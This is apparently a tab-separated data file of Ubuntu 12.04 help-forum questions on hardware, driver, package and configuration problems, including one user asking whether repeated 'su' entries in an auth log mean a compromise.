smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g98m [ geforce g 103m ] ( rev a1 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) toni @ toni-hp-g61-notebook-pc : ~/documents $ nm-tool ** ( process:4012 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files networkmanager tool state : unknown ** ( process:4012 ) : warning ** : error : could not connect to networkmanager toni @ toni-hp-g61-notebook-pc : ~/documents $ cat /etc/network/interfaces auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp iface eth0 inet static address 192.168.1.10 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1
177087	how can i configure xorg.conf to display ubuntu on a plasma television ?	i am trying to hook up my ubuntu computer to my plasma television . i 've recently installed ubuntu 12.04 on an old pentium 4 computer that has a standard vesa graphics card , running the default standard vesa graphics driver . the computer runs fine when attached to a monitor using a vga to vga cord . i 've attached a vga to rca component cable ( red , blue , green ) from the computer to my panasonic th-42pa60a plasma television . the sound card is attached from the computer to the television using an audio-jack to rca composite ( red , white yellow ) cord . i receive absolutely no video signal on the television . it appears black . unplugging the sound-jack to rca composite cable did nothing . when i unplug the computer from the television , and plug it into the monitor using the vga to vga cable , without turning off the computer , ubuntu appears on the monitor with this error ; i 've been informed that i may need to configure the xorg.conf file found at /etc/x11/xorg.conf since `` monitors tell computers what they can handle , but that does n't happen over a composite or component cable '' . there was no such xorg.conf file in that directory , so i created one . i 've attempted using the following xorg.conf configuration code which i found on ubuntu forums section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 42.0 - 52.0 vertrefresh 55.0 - 65.0 modeline `` 1024x768 '' 60.80 1024 1056 1128 1272 768 768 770 796 modeline `` 800x600 '' 38.21 800 832 976 1008 600 612 618 631 modeline `` 640x480 '' 24.11 640 672 760 792 480 490 495 50 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection endsection after reconnecting the computer to the television and then booting the computer up , i still receive no video signal , only a black screen . when reconnecting the computer back to the monitor , a crtc error is showing up on the screen again . how can configure my xorg.conf file so that i can use ubuntu on my plasma television , and is there more , or different things that may need to be done ? the plasma television 's operating instruction manual provided the following information relating to aspect ratios , frequencies and total specs ; these are my panasonic th-42pa60a plasma televsion specifications .
177089	dns resolution in ubuntu 12.04	i use a vpn client to access my company 's intranet . it used to work fine with older versions of ubuntu . but on 12.04 it does n't . it is able to connect but i do not see any packet exchange happening , hence not able to browse the intranet . during some troubleshooting i found out that in 12.04 dns resolution has been changed , and my vpn client is not able to update the dns server . after a little googling i found a post which proposed adding the dns nameserver ip addresses to /etc/dhcp/dhclient.conf as follows . prepend domain-name-servers < ip1 > , < ip2 > ; # this was the addition i made request subnet-mask , broadcast-address , time-offset , routers , domain-name , domain-name-servers , domain-search , host-name , netbios-name-servers , netbios-scope , interface-mtu , rfc3442-classless-static-routes , ntp-servers , dhcp6.domain-search , dhcp6.fqdn , dhcp6.name-servers , dhcp6.sntp-servers ; this resolves the issue and i can browse the intranet website . but this does n't persist for a longer time . it appears the dns gets changed after a while . is there a way i can make dns settings not to change , or every time it changes it should get those ip addresses also included ?
177090	broadcom sta [ 4727 ] wireless not detecting after driver installation	i have a broadcom 802.11n [ 4727 ] wifi adapter.. i searched a lot and found out we need to do some steps in order to get the wifi working . so for this i have no idea how much of installations and blacklisting i have done and still in the end my wireless is still not detected . ( `` wireless '' option does not appear under `` network '' ) i could really use some help to get my wifi working soon . ty !
177103	alsa does not see sound cards after restoring previous home	i have trouble with sound on a fresh installation of 12.04 . i have just installed a new graphics card and with that , i decided to install 12.04 from scratch . previously , the computer ran 11.04 and i reused the old /home partition . in 11.04 there were no issues . i have an audigy 2 card , which is also reflected nicely by alsa : xerxes @ xerxes : /proc/asound $ cat cards 0 [ audigy2 ] : audigy2 - sb audigy 2 platinum [ sb0240p ] sb audigy 2 platinum [ sb0240p ] ( rev.4 , serial:0x10021102 ) at 0xec00 , irq 16 1 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfe89c000 irq 45 however , i have no sound . if i click the sound icon in the top bar , an empty menu opens , as in this picture : when i try to enter the sound settings ( via system settings - > sound ) , the system settings window crashes . when i try to enter the audio settings in vlc player ( via tools - > preferences - > audio ) , vlc player crashes . when i try to simply play music in rhythmbox , it crashes . i can not open pavucontrol . alsamixer runs fine in the terminal and shows the audigy card . aplay -l outputs nothing , but sudo aplay -l outputs : xerxes @ xerxes : /proc/asound $ aplay -l home directory /home/xerxes not ours . **** list of playback hardware devices **** card 0 : audigy2 [ sb audigy 2 platinum [ sb0240p ] ] , device 0 : emu10k1 [ adc capture/standard pcm playback ] subdevices : 32/32 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 subdevice # 8 : subdevice # 8 subdevice # 9 : subdevice # 9 subdevice # 10 : subdevice # 10 subdevice # 11 : subdevice # 11 subdevice # 12 : subdevice # 12 subdevice # 13 : subdevice # 13 subdevice # 14 : subdevice # 14 subdevice # 15 : subdevice # 15 subdevice # 16 : subdevice # 16 subdevice # 17 : subdevice # 17 subdevice # 18 : subdevice # 18 subdevice # 19 : subdevice # 19 subdevice # 20 : subdevice # 20 subdevice # 21 : subdevice # 21 subdevice # 22 : subdevice # 22 subdevice # 23 : subdevice # 23 subdevice # 24 : subdevice # 24 subdevice # 25 : subdevice # 25 subdevice # 26 : subdevice # 26 subdevice # 27 : subdevice # 27 subdevice # 28 : subdevice # 28 subdevice # 29 : subdevice # 29 subdevice # 30 : subdevice # 30 subdevice # 31 : subdevice # 31 card 0 : audigy2 [ sb audigy 2 platinum [ sb0240p ] ] , device 2 : emu10k1 efx [ multichannel capture/pt playback ] subdevices : 8/8 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 card 0 : audigy2 [ sb audigy 2 platinum [ sb0240p ] ] , device 3 : emu10k1 [ multichannel playback ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : audigy2 [ sb audigy 2 platinum [ sb0240p ] ] , device 4 : p16v [ p16v ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 any ideas are much appreciated : - )
177107	how to instal lamp for ubuntu 12.04 lts ?	i 'm studying sql database right now and i need a mysql server . i was guided to use a lamp server on linux .. but i do n't know how to install it on my ubuntu 12.04 lts ? ! ! i looked for previous situations like me and i found that i should install some software called tasksel .. but when i did .. something went wrong and it failed to install the lamp server . so , please i need your help in this problem
177110	how can i set the resolution on a dell 19 inch monitor to 1368x768 ?	i am using a dell 19 inch lcd monitor.every time i boot , i get output at 1368x768 , 60hz . in my display settings i have set `` laptop '' to 1024x768 , but my monitor is compatible with 1368x768 ( 16:9 ) . how can i set the resolution to 1368x768 ? my graphics card is the nvidia geforce 7025/nforce 630a , on an asus m2n68-am plus motherboard .
177115	can not instal ubuntu	thanks ubuntu for its great os , two months ago i bought a new computer to begin learning and using ubuntu and i had very little problems until yesterday . two mounts ago i did successfully install the following iso images from a dvd ubuntu-10.04.4-dvd-amd64.iso & ubuntu-11.10-dvd-amd64.iso yesterday i could not install from neither dvd nor usb drives : ubuntu-12.04-desktop-i386.iso & ubuntu-12.04-dvd-amd64.iso i succeed to get the first 'ascii ' screen only when i immediately press the escape key ( otherwise i get nothing at all ) , i select then the correct install menu but i get nothing but a dark screen . however it seems that the install menu changes into graphical screen . in the same computer i can actually install ubuntu-10.04.4-dvd-amd64.iso & ubuntu-11.10-dvd-amd64.iso ) . in another oldest computer i can also install ubuntu-12.04-desktop-i386.iso the new computer is : machine : mobo : asustek model : p8z68-v lx version : rev x.0x bios : american megatrends version : 3506 date : 01/17/2012 cpu : quad core intel core i5-2500k cpu graphics : card : nvidia device 1244 bus-id : 01:00.0 x.org : 1.7.6 driver : nvidia resolution : 1280x1024 @ 60.0hz glx renderer : geforce gtx 550 ti/pcie/sse2 glx version : 4.2.0 nvidia 304.37 direct rendering : yes audio : card-1 : intel cougar point high definition audio controller driver : hda intel bus-id : 00:1b.0 card-2 : nvidia device 0bee driver : hda intel bus-id : 01:00.1 network : card : realtek rtl8111/8168b pci express gigabit ethernet controller drives : 1 : ata st3500418as 500.1gb 2 : usb u3_cruzer_micro 2.1gb optical : hl-dt-st dvdram_gsa-h60n
177116	software center crashes all the time	like the title says my software center crashes all the time . this happens as soon as i start it , i have to force close it to shut it down , and it is pretty much unusable as it refreshes the lists constantly even my installed apps . dose this happen to every one ? can i keep it from refreshing so often ( i do n't need it to refresh if i 'm just browsing , a manual refresh when i need it would be great. ) ? and is there a fix for all the crashes ( it becomes grayed out for no reason even when starting up ) ? any comments and answers are welcome .
177121	guake and gnome-terminal $ path	most of the time i use guake as terminal emulator . today i wanted to start a program from gnome-terminal and it tells me that it 's not installed currently , although i ran the program a minute ago on guake . when i echo $ term , i get xterm on both , however echo $ path in gnome-terminal differs . does anyone know what this is about ?
177124	can not install ubuntu 12.04 lts using wubi	i have been trying to install ubuntu 12.04 lts to my new laptop from windows using wubi . however , i am getting the following error message : could not retrive the required disk image files can anyone help me solve this problem ?
177126	how do i create an icon for a script or software that is available to every user whether new or existing	there seems to be lots of help in the faqs for customizing unity , even with dconf-editor and other tools . however , as an administrator of a large thin client installation , from time to time , there are special installations of educational software or of scripts for special uses that i have to make available to all users . take , for example , the application for oaks standardized testing . to install it on a workstation , one only need to untar the distro and create a link of some kind to the start up script . once done , how to i `` push '' that out to every user on the network ( at their next login , obviously ) so that it is available to them on the unity dash ?
177127	how to configure thunderbird to notify new mails only in certain folders ?	i have ubuntu 12.04 and recently started using thunderbird . i have gmail account and have configured a lot of labels in it , all of which appear as folders in thunderbird . most of these are just subscriptions to mailing lists and are not that important . i have a few labels which are very important , for whom i would like immediate notification when a mail arrives . the problem is that the mail indicator in the unity top panel , lights up for any incoming mail . how do i configure it to indicate incoming mails only in certain folders ?
177128	why can i not install the 'gir1.2-gwibber-gtk-0.2 ' package ?	when i try to install gir1.2-gwibber-gtk-0.2 , i get the following errors : agmenor @ ultimeextensaub : ~ $ sudo apt-get install gir1.2-gwibber-gtk-0.2 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gir1.2-gwibber-gtk-0.2 : depends : libgwibber-gtk2 ( = 3.4.2-0ubuntu2 ) but it is not going to be installed depends : gir1.2-gwibber-0.2 ( = 3.4.2-0ubuntu2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . agmenor @ ultimeextensaub : ~ $ sudo apt-get install libgwibber-gtk2 [ … ] the following packages have unmet dependencies : libgwibber-gtk2 : depends : libgwibber2 ( > = 3.3.90 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . agmenor @ ultimeextensaub : ~ $ sudo apt-get install libgwibber2 [ … ] the following packages have unmet dependencies : libgwibber2 : depends : gwibber-service ( > = 2.31.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . agmenor @ ultimeextensaub : ~ $ sudo apt-get install gwibber-service [ … ] gwibber-service is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . the version of gwibber-service is gwibber-service 3.5.2+webaccounts4-0ubuntu1 . i realize you may need more information : if you tell me what to post in the comments , i 'll edit my question .
177137	can not install kdenlive on ubuntu 12.04	i 've tried to install kdenlive from the terminal by typing : sudo add-apt-repository ppa : sunab/kdenlive-release & & sudo apt-get update & & sudo apt-get install kdenlive the following packages have unmet dependencies . kdenlive : depends : kdenlive-data ( = 0.9.2-0ubuntu0~sunab~precise2 ) but 0.9.3+git20120701.53f9c1b9-0ubuntu0~sunab~oneiric1 is to be installed e : unable to correct problems , you have held broken packages . can anyone help , please ? ( it worked perfectly before i updated to the new ubuntu )
177139	gnome terminal not showing up in unity , why ?	i am using ubuntu 12.04 , how do i see the applications open on different workspaces . the issue that i am having is that i have opened 3 instances gnome-terminal and have minimized them ; the unity launcher is n't showing any of the terminal application i guess they might be on another workspace . to my surprise , i am noticing that the terminal are not showing up on unity launcher . this is bugging me . any logs that i could paste here , that would help in tshooting . please help . thanks
177142	how can i get left clicking on my mouse to work again	ok so far i have been using ubuntu 12.04 without any problem , but one the mouse clicker just do n't work when i select something . now it works when i am opening up a program , but to lets say i want to open up the file manager . i got to right click then select open then hit enter to open it and that goes for any thing else i want to open , what i am asking is how can i restore its functionality .
177148	no sound after select `` dummy output '' in configurations- > audio	i ' just having problems with sound for a little while now since i selected dummy output , all other `` outpus '' in the menu disappear , and i dont have sound . i tried with some tutorials by now : about alsa mixer , and i ca n't restore my original audio settings . i forgot to mention that before i selected dummy output , i was experimenting troubles with sound like : sound only via headphones . i hope anyone can help me .
177151	xdebug + netbeans on ubuntu	i 'm trying to debug my code using xdebug in netbeans , but it 's unresponsive . i 'm using the current releases of netbeans and ubuntu .
177152	how can i check download statistics for my application ?	my very first application , easy stopwatch , was published about a week ago in ubuntu software center . i 'm curious how many people already downloaded it . if i check https : //myapps.developer.ubuntu.com it says there was no sales so far , but the app has couple reviews , so it 's not possible . i wonder if it 's a bug or i ca n't get stats if app costs $ 0 .
177154	cursor jumps to corner of screen when i touch edges of touchpad/trackpad	when using ubuntu 12.04 , if i happen to touch one of the extreme edges of my touchpad , my cursor spontaneously jumps to the top left corner of the screen . i have tried disabling all touchpad features within system settings , but this behavior persists . is this a bug or a `` feature '' gone wrong ? can anybody help me out ? thanks .
177155	`` successful su for user by root '' - suspicious entries in my /var/log/auth.log ?	this post on reddit made me go through my logs . that 's when i discovered the following entries which appeared on two non-subsequent days . `` user '' is my user account . aug 4 22:50:37 ubuntusystem sudo : pam_unix ( sudo : session ) : session opened for user root by user ( uid=1000 ) aug 4 22:50:39 ubuntusystem sudo : pam_unix ( sudo : session ) : session closed for user root aug 4 22:51:16 ubuntusystem su [ 10710 ] : successful su for user by root aug 4 22:51:16 ubuntusystem su [ 10710 ] : + ? ? ? root : user aug 4 22:51:16 ubuntusystem su [ 10710 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10710 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10720 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10720 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10720 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10720 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10735 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10735 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10735 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10735 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10763 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10763 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10763 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10763 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10773 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10773 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10773 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10773 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10788 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10788 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10788 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10788 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10801 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10801 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10801 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10801 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10814 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10814 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10814 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10814 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10829 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10829 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10829 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10829 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10842 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10842 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10842 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10842 ] : pam_unix ( su : session ) : session closed for user user aug 4 22:51:17 ubuntusystem su [ 10855 ] : successful su for user by root aug 4 22:51:17 ubuntusystem su [ 10855 ] : + ? ? ? root : user aug 4 22:51:17 ubuntusystem su [ 10855 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 22:51:17 ubuntusystem su [ 10855 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11153 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11153 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11153 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11153 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11166 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11166 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11166 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11166 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11181 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11181 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11181 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11181 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11193 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11193 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11193 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11193 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11211 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11211 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11211 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11211 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11226 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11226 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11226 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11226 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11241 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11241 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11241 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11241 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:41:39 ubuntusystem su [ 11253 ] : successful su for user by root aug 4 23:41:39 ubuntusystem su [ 11253 ] : + ? ? ? root : user aug 4 23:41:39 ubuntusystem su [ 11253 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 4 23:41:39 ubuntusystem su [ 11253 ] : pam_unix ( su : session ) : session closed for user user aug 4 23:42:18 ubuntusystem gnome-screensaver-dialog : gkr-pam : unlocked login keyring aug 4 23:42:33 ubuntusystem polkitd ( authority=local ) : unregistered authentication agent for unix-session : /org/freedesktop/consolekit/session2 ( system bus name :1.48 , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) ( disconnected from bus ) aug 15 20:17:01 ubuntusystem cron [ 26579 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) aug 15 20:17:01 ubuntusystem cron [ 26579 ] : pam_unix ( cron : session ) : session closed for user root aug 15 21:15:15 ubuntusystem su [ 27098 ] : successful su for user by root aug 15 21:15:15 ubuntusystem su [ 27098 ] : + ? ? ? root : user aug 15 21:15:15 ubuntusystem su [ 27098 ] : pam_unix ( su : session ) : session opened for user user by ( uid=0 ) aug 15 21:15:15 ubuntusystem su [ 27098 ] : pam_unix ( su : session ) : session closed for user user aug 15 21:17:01 ubuntusystem cron [ 27141 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) aug 15 21:17:01 ubuntusystem cron [ 27141 ] : pam_unix ( cron : session ) : session closed for user root apart from these iterations the only other times i found a similar output was when trying out the guest account : aug 11 22:38:49 ubuntusystem lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm aug 11 22:38:49 ubuntusystem groupadd [ 2918 ] : group added to /etc/group : name=guest-4eflre , gid=125 aug 11 22:38:49 ubuntusystem groupadd [ 2918 ] : group added to /etc/gshadow : name=guest-4eflre aug 11 22:38:49 ubuntusystem groupadd [ 2918 ] : new group : name=guest-4eflre , gid=125 aug 11 22:38:50 ubuntusystem useradd [ 2922 ] : new user : name=guest-4eflre , uid=115 , gid=125 , home=/ , shell=/bin/bash aug 11 22:38:50 ubuntusystem usermod [ 2927 ] : change user 'guest-4eflre ' password aug 11 22:38:50 ubuntusystem chage [ 2932 ] : changed password expiry for guest-4eflre aug 11 22:38:50 ubuntusystem chfn [ 2935 ] : changed user 'guest-4eflre ' information aug 11 22:38:50 ubuntusystem usermod [ 2943 ] : change user 'guest-4eflre ' home from '/ ' to '/tmp/guest-4eflre' aug 11 22:38:50 ubuntusystem su [ 2948 ] : successful su for guest-4eflre by root aug 11 22:38:50 ubuntusystem su [ 2948 ] : + ? ? ? root : guest-4eflre aug 11 22:38:50 ubuntusystem su [ 2948 ] : pam_unix ( su : session ) : session opened for user guest-4eflre by ( uid=0 ) aug 11 22:38:50 ubuntusystem su [ 2948 ] : pam_unix ( su : session ) : session closed for user guest-4eflre aug 11 22:38:50 ubuntusystem lightdm : pam_unix ( lightdm-autologin : session ) : session opened for user guest-4eflre by ( uid=0 ) aug 11 22:38:50 ubuntusystem lightdm : pam_ck_connector ( lightdm-autologin : session ) : nox11 mode , ignoring pam_tty :0 i might have to add that i set up my system only fairly recently ( aug 4 ) . is this behaviour normal ? what exactly is going on with all the su commands ? do i have to be worried that my system might be compromised ? many thanks in advance .
177162	ubuntu 12.04 - e1000e slow performance	i 'm running ubuntu 12.04 on a thinkpad w510 . lspci reports this ethernet controller 00:19.0 ethernet controller : intel corporation 82577lm gigabit network connection ( rev 06 ) by default the e1000e kernel module is used for this ethernet connection and i 'm seeing very poor network performance compared to windows 7 . ubuntu 12.04 ~20 mbps win7 100mbps it is negotiating a proper 1gig full duplex connection but the performance still sucks . note i ended up downloading the latest driver from intels website which seemed to be a few versions ahead but it made no difference . [ 12619.167149 ] e1000e 0000:00:19.0 : pci int a disabled [ 12625.523148 ] e1000e : intel ( r ) pro/1000 network driver - 2.0.0.1-napi [ 12625.523154 ] e1000e : copyright ( c ) 1999 - 2012 intel corporation . [ 12625.523222 ] e1000e 0000:00:19.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 [ 12625.523250 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 12625.534516 ] e1000e 0000:00:19.0 : irq 54 for msi/msi-x [ 12625.725027 ] e1000e 0000:00:19.0 : eth0 : ( pci express:2.5gt/s : width x1 ) f0 : de : f1:48:2c:17 [ 12625.725037 ] e1000e 0000:00:19.0 : eth0 : intel ( r ) pro/1000 network connection [ 12625.725299 ] e1000e 0000:00:19.0 : eth0 : mac : 10 , phy : 10 , pba no : a002ff-0ff [ 12625.856777 ] e1000e 0000:00:19.0 : irq 54 for msi/msi-x [ 12625.912457 ] e1000e 0000:00:19.0 : irq 54 for msi/msi-x [ 12628.803772 ] e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : rx
177166	should i upgrade linux-headers-generic , linux-image-generic ?	i used the 12.04 minimal installation image/ cli installer to install the base operating system . once the base system was installed i did the following : sudo apt-get install python-software-properties sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo add-apt-repository ppa : xorg-edgers/ppa sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get upgrade at this point there were system upgrades which were downloaded and applied . i went on to install xorg nvidia-current gdm gnome-shell synaptic . every step of the way i 'd check for `` upgrades '' and after the initial bout of upgrades nothing was ever upgraded . once i rebooted , logged into the gnome desktop environment and started synaptic , however , on mark all upgrades synaptic said : to be upgraded linux-headers-generic linux-image-generic it seems like that should 've been upgraded during the installation , yes ? but i 'm using ppa which draw software newer than that which is available in synaptic . will i downgrade the ppa installations i 've already applied to the system by running the aforementioned upgrade through synaptic ?
177167	how can i get sudo to accept my password ?	i am trying to install subversion on my ubuntu 12.04 desktop . i follow the commands to start this process , using apt-get : sudo apt-get update sudo apt-get install subversion either of the above commands then ask me to enter my password . though my user password allows me to get into ubuntu , when i enter it here there is no echo back as i enter the password . it acts like nothing is being entered at all . then when i hit enter , it tells me it failed x number of times . when i have tried to enter it the third time it bombs out and tells me this will be reported . it does not tell me who it reports it to , considering it is my machine and my desktop installation of ubuntu 12.04 . i am new to linux but a very experienced windows user . i am trying to switch mostly over to linux ( ubuntu ) . am i doing something wrong ?
177175	can not upgrade to ubuntu 12.04	i can not upgrade to ubuntu 12.04 . i have tried many times with two different commercial dvd 's and on two different computers . both had 11.10 as the os . finally got the newer computer to upgrade via download , but older computer will not upgrade at all . in addition the upgrade attempt on the older computer leaves no os at all installed . luckily i have a cd of ubuntu 11.04 i can reload then upgrade back to 11.10 . but i want to use 12.04 on both machines . edit : this is on an hp desktop as is the other computer attempting to install from dvd gives a fatal error message which is different each time one was something about a blacklisted file and not being able to calculate the upgrade .
177176	ssd errors with 12.04	i 've just upgraded my 32-bit xubuntu 10.04 system to 64-bit 12.04 ( core 2 duo ) and am getting consistent errors on my crucial ssd which causes it to remount in read-only mode after about an hour of using the system . sometimes it seems the cause is heavy i/o installing new applications ( it 's a fresh install ) while other times it fails while sitting idle . bug # 992424 describes the issue with several people confirming it and others posting kernels that work for them . it was originally reported in february , but the latest activity seems to be early june . i 've tried these kernels with no success : 3.2.29 ( installed with xubuntu 12.04 ) 3.1.5 3.0.41 3.0.17 what should i try next ? i think the next step is to install 11.10 and hope the problem was introduced with 12.04 , but i 'm wondering if perhaps there could be a 32- vs. 64-bit issue here . it 's a dell vostro 200 with a 64-bit core 2 duo , so i installed the 64-bit version , but i was running the 32-bit version before with no trouble . this all started immediately after installing 64-bit 12.04 . if it matters , i first installed over my existing 10.04 system hoping to keep most settings in tact . when i got the first errors , i did a clean install and copied over only my non-configuration home directory files .
177184	where could i get the apparmor profile for latest skype4 ?	where could i get the apparmor profile for latest skype4 ? i tried to make my own based on previous skype version but there are too many errors while launching .
